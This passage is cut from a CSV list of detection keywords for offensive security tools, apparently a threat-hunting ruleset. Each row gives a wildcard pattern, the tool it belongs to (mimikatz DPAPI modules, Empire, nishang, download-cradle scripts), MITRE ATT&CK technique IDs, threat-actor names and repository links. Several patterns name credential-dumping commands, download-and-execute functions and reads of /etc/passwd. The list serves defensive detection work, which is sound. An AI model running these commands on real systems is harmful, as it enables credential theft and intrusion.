Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,0,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*download *bloodhound*,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*download *Roaming\mRemoteNG\confCons.xml*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*download /etc/passwd*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,0,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*Download:Cradle.js*,offensive_tool_keyword,Payload-Download-Cradles,This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Payload-Download-Cradles,1,1,N/A,N/A,3,241,54,2022-07-07T07:20:36Z,2021-05-14T08:56:54Z -*Download_Cradles.*,offensive_tool_keyword,Payload-Download-Cradles,This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Payload-Download-Cradles,1,1,N/A,N/A,3,241,54,2022-07-07T07:20:36Z,2021-05-14T08:56:54Z -*Download_Execute*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*DownloadAndExtractFromRemoteRegistry*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*DownloadAndExtractFromRemoteRegistry*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Download-Cradles.cmd*,offensive_tool_keyword,Payload-Download-Cradles,This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/VirtualAlllocEx/Payload-Download-Cradles,1,1,N/A,N/A,3,241,54,2022-07-07T07:20:36Z,2021-05-14T08:56:54Z -*Download-Execute-PS*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*DownloadFileImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*Downloading */*.tar to /tmp/*.pak*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,0,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*downloadMalwareDomains*,offensive_tool_keyword,domainhunter,Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ,T1583.002 - T1568.002,TA0011 - TA0009,N/A,N/A,Phishing,https://github.com/threatexpress/domainhunter,1,0,N/A,N/A,10,1380,291,2022-10-26T03:15:13Z,2017-03-01T11:16:26Z -*downloads/wapiti-code*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*DownloadString*https://checkip.amazonaws.com*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,0,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*dpapi.py backupkeys -t */*@*,greyware_tool_keyword,dpapi.py,the command is used to extract the Data Protection API (DPAPI) backup keys from a target system. DPAPI is a Windows API that provides data protection services to secure sensitive data. such as private keys. passwords. and other secrets. By obtaining the DPAPI backup keys. an attacker can potentially decrypt sensitive data stored on the target system or impersonate users. gaining unauthorized access to other systems and resources.,T1552.006,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*dpapi.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*dpapi/decryptor.py*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*dpapi::blob*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cache*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::capi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::chrome*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cloudapkd*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cloudapreg*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cng*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::create*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::cred*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::credhist*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::luna*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::masterkey*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::protect*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::ps*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::rdg*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::sccm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::ssh*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::tpm*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::vault*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::wifi*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi::wwman*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*dpapi_dump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*dpapi_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 